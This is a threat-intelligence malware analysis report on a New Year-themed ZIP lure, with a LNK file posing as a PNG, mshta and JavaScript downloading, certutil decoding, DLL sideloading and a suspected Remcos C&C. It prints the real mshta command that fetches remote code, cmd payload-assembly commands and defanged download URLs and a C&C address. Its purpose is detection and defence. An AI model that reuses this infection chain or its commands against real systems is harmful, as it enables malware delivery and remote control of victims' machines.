Festive Facade: Dissecting Multi-Stage Malware in New Year-themed Lure

Key Takeaways

• • Cyble Research and Intelligence Labs (CRIL) encountered a ZIP archive file that could potentially spread through New Year-themed spam emails. The ZIP attachment contains a shortcut file disguised as a PNG image.

• • When the shortcut file is executed, it runs MSHTA, utilizing JavaScript to download and open a “Happy New Year” image file, tricking the user into believing it’s a harmless image.

• • In the background, the JavaScript silently downloads and decodes a malicious payload using the Certutil executable, which is a CAB file. This CAB file is then extracted, dropping the malware executable.

• • Upon executing the malware executable, it drops a subsequent stage DLL payload and employs DLL sideloading to progress the infection, establishing a connection to the Command-and-Control (C&C) server.

Overview

On January 3rd, CRIL came across a ZIP archive file named “happy new year.zip” on VirusTotal. While the actual method of initial infection remains unknown, we suspect that it might be delivered through spam emails featuring a New Year theme. Upon analyzing the file, we observed that the ZIP archive file includes a misleading PNG file named “happy new year.png,” designed to lure users into opening it. However, it is, in fact, a shortcut LNK file disguised as an image file. If the user perceives it as an image file and opens it with a double click, it triggers the execution of the shortcut LNK file. This LNK file then proceeds to download an HTA file and initiate its execution. The HTA file, in turn, downloads and displays a JPG file in the browser, displaying a “Happy New Year 2024” message. This sequence aims to deceive users, making them believe that they have simply opened an image file received as a spam email attachment. However, in the background, the embedded script within the HTA file downloads and decodes a malware payload from a remote server, subsequently executing it. This action results in the infection of the user’s system with malware. The infection method employs DLL sideloading to obtain the final-stage payload. It establishes a connection to the Command and Control (C&C) server, possibly associated with a Remcos Remote Access Trojan (RAT) server. The image below illustrates the overall infection chain of the malware, initiated from the ZIP archive file.

Technical Details

Upon extracting the “happy new year.zip” archive file, users can see a PNG file named “happy new year.png.” However, this file is a disguised shortcut LNK file, pretending to be a PNG image, as shown below.

If users proceed to open it with a double-click the file, the shortcut file runs, launching the following command that opens an “M.hta” file through the MSHTA executable, as shown in the figure below.

• • %SystemRoot%\system32\mshta.exe hxxps://mail[.]chapanakit-rta[.]com/Queen/M[.]hta

The figure below shows the code snippet of the “M.hta” file, which includes an embedded JavaScript function that acts as a downloader, retrieving an encoded payload from a remote server.

When the “M.hta” is executed, it initially opens an image with a “Happy New Year” theme from a specific URL. It then displays this image to the victim, as shown in the figure below, creating the illusion that they have merely opened an image file received as an email attachment.

However, in the background, the JavaScript code discreetly employs predefined functions to execute the following tasks:

• • Following the display of the lure image, the script creates a 10-second delay in execution using the command-line “ping -n 10 127.0.0.1.”

• • Subsequently, it downloads another JPG file, named “wct9D39.jpg,” from a remote server via curl, saving it as “C:\Users\Public\Documents\wct9D39.jpg.”

• • However, this file is disguised as a JPG image while actually being a certificate file. It contains a base64-encoded data enclosed within the “—–BEGIN CERTIFICATE—–“ and “—–END CERTIFICATE—–“ tags, as shown below.

• • The JavaScript then introduces a 20-second delay in execution and utilizes certutil.exe to decode the base64 data within the “wct9D39.jpg” file. The resulting decoded content is a CAB archive file, stored as “C:\Users\Public\Documents\wct9D39.tmp,” as shown below.

• • Next, the script employs expand.exe to extract the CAB archive file, saving it as “c:\users\public\Videos\winp.exe,” as below.

• • Finally, the script executes the “winp.exe” file through the command prompt, implementing a 5-second delay prior to execution.

The process tree depicted below illustrates the sequence of events from MSHTA execution to the eventual execution of “winp.exe.”

Upon execution of “winp.exe,” it drops two binary files with random names. It then employs cmd.exe to copy the contents of these two binary files, combining them into a malicious DLL file named “nView.dll.” Likewise, it generates another pair of binary files with random names. It utilizes cmd.exe to merge their content into a legitimate executable file named “nvTaskBar.exe,” which is a legitimate executable, as shown in the below process tree figure.

• • cmd.exe /c copy “C:\Users\Public\<random_name>” /B + “C:\Users\Public\< random_name >” /B C:\Users\Public\nView.dll /B /Y

• • cmd.exe /c copy “C:\Users\Public\<random_name >” /B + “C:\Users\Public\<random_name >” /B C:\Users\Public\nvTaskBar.exe /B /Y

Persistence

Furthermore, “winp.exe” initiates a command that establishes a scheduled task named “ToSestsc,” set to run every 10 minutes. Upon start, this task executes the “nvTaskBar.exe” file from the specified directory with the argument “usea”, as shown below.

The “nvTaskBar.exe” is a Toolbar, which is a Desktop Management Software Utility for NVIDIA NVS and NVIDIA Quadro products. Typically, when executed, this executable loads a DLL called “nView.dll.”

DLL Sideloading

In this instance, the “nvTaskBar.exe” loads the dropped malicious “nView.dll” from the same directory using the DLL sideloading method, as shown in the figure below.

Following the loading of the “nView.dll,” it proceeds to drop an additional malware DLL named “NVDriverSearch.ct” and subsequently loads it as well. During execution, this DLL connects to the command-and-control (C&C) server with the below IP address:

• • 91[.]245[.]253[.]46:443

Upon investigation, we observed that this specific IP address was previously associated with the malicious RAT known as Remcos. This RAT was connected to the server using different unknown port numbers. In this infection, it utilizes port 443 to establish a connection with the C&C server. We suspect the possibility of a Remcos RAT infection in this case.

Conclusion

Threat Actors (TAs) often use themed spam email attachments because they leverage the curiosity and excitement surrounding popular events or occasions. These themed emails aim to exploit the recipient’s trust and interest, making them more likely to open the attachment or click on links within the email. During the festive season, people often receive greetings, well-wishes, or other related holiday-themed content, creating an opportunity for attackers to disguise malicious payloads. In this case, TAs utilize New Year-themed spam emails to lure users into becoming victims of malware infections. The infection technique involves the use of a JavaScript downloader, decoding base64 data using certutil, and DLL sideloading to facilitate the infection process. By employing a variety of techniques, TAs aim to increase the sophistication and effectiveness of their attacks, making it more challenging for defenders to detect, prevent, and respond to these threats. CRIL monitors the latest phishing or malware strains in circulation, delivering timely analyses with actionable intelligence to help users protect themselves against these attacks.

Our Recommendations

• • The initial breach occurs via spam emails. Therefore, it’s advisable to deploy strong email filtering systems for identifying and preventing the dissemination of harmful attachments.

• • When handling email attachments, particularly those from unknown senders, exercising caution is crucial. Verify the sender’s identity, particularly if an email seems suspicious.

• • Consider disabling or limiting the execution of scripting languages, such as PowerShell or JavaScript, on user workstations and servers if they are not essential for legitimate purposes.

• • Deploy strong antivirus and anti-malware solutions to detect and remove malicious executable files.

• • Enhance the system security by creating strong, distinct passwords for each of the accounts and, whenever feasible, activate two-factor authentication.

• • Set up network-level monitoring to detect unusual activities or data exfiltration by malware. Block suspicious activities to prevent potential breaches.

• • Regularly back up data to guarantee the ability to recover it in case of an infection and keep users informed about the most current phishing and social engineering methods employed by cybercriminals.

MITRE ATT&CK® Techniques

Tactic	Technique	Procedure
Initial Access (TA0001)	Spearphishing Attachment (T1566.001)	This malware reaches users via spam email.
Execution  (TA0002)	Command and Scripting Interpreter: Windows Command Shell (T1059.003)	cmd.exe is used to run commands such as copy, expand, ping and run the malware executable.
Execution  (TA0002)	Command and Scripting Interpreter: JavaScript (T1059.007)	JavaScript downloaded is used to download malware payload.
Persistence (TA0002)	Scheduled Task/Job (T1053.005)	Adds task schedular entry for persistence.
Defense Evasion (TA0005)	Masquerading (T1036)	LNK file masqueraded as PNG and Certificate file masqueraded as JPG.
Defense Evasion (TA0005)	System Binary Proxy Execution: Mshta (T1218.005)	Abuse mshta.exe to proxy execution of malicious JavaScript.
Defense Evasion (TA0005)	Deobfuscate/Decode Files or Information (T1140)	Uses certutil -decode.
Defense Evasion (TA0005)	Hijack Execution Flow: DLL Side-Loading (T1574.002)	Malware uses DLL sideloading for payload execution.
C&C(TA0011)	Application Layer Protocol (T1071)	Malware exe communicate to C&C server.

Indicators of Compromise (IOCs)

Indicators	Indicator Type	Description
3551655021b1ac0175d55e73c9c8af2f d55bc39f385fca3294e45a844f661444d8908988 986abd7f0b35386c2babb9fb1c81c3167a1f76bea1dd4c0d8cab5cc0e27798e8	MD5 SHA1 SHA256	happy new year.zip
99a10c546b13d3efd945c574ed4e10a4 884a2351f5c41a26a351a6d8ca5ddb84ce6130a8 b467fb098af61e4187a24447ba62c1565e354d989c8a9860106a574a81114738	MD5 SHA1 SHA256	happy new year.lnk
a712950af45bdc5e33863aae223c1ac6 5e03e8aeb209f18f5f6ba12ef28011ad8c40d180 3ee3d0fe0a4bfb5b0409803a5151fead88711ff56c349c22b7086a468fcc4400	MD5 SHA1 SHA256	M.hta
ef96afb2794f800918fddd76f6756e1c 5b703687f8f4ad80dd8a6328bb797fec339da9f2 26a2bed37cefc7877a3f2e1258bbcae5cc04914c4918992f067cc8df386e569e	MD5 SHA1 SHA256	wct9D39.jpg (pem certificate file)
a319c07c124da09259a2ff9848b0bb38 eeb7e301fc7e33ea2e67b44fc363aae9db7a7f9f 42ae60c07deb4773e712b3fd71dddf51a545d6090fec39f46694ba6974e04bac	MD5 SHA1 SHA256	wct9D39.tmp (CAB file)
37f2f766cef155479ca67267a9734d88 5d25509ca9a8d5874e4e7e4f04886cc5ac64be45 87d3b77cbcb9c4a7f6cfbb4f8ada11aa7edf7b5343803401060671cce174a717	MD5 SHA1 SHA256	Winp.exe
7ea17ffb336a7d8b24d62ba78151d264 10f30319eb0f7f939e2e872fdcef2f17d448c924 dd261a5db199b32414c33136aed44c3ebe2ae55f18991ae3dc341fc43a1ef7f4	MD5 SHA1 SHA256	nView.dll
128cfff31aa393605ececf2689a40fd6 5002563c40154177d4afa4154a73a712532f242a 5afe21142999659a4050f6e038a6dab96cf4827f332497049a91cdb1a4d4828b	MD5 SHA1 SHA256	NVDriverSearch.ct
hxxps[:]//mail[.]chapanakit-rta[.]com/Queen/M[.]hta	URL	HTA file download link
hxxps[:]//mail[.]chapanakit-rta[.]com/pt/wct9D39.jpg	URL	Certificate file download link
91[.]245[.]253[.]46:443	IP: Port	C&C

---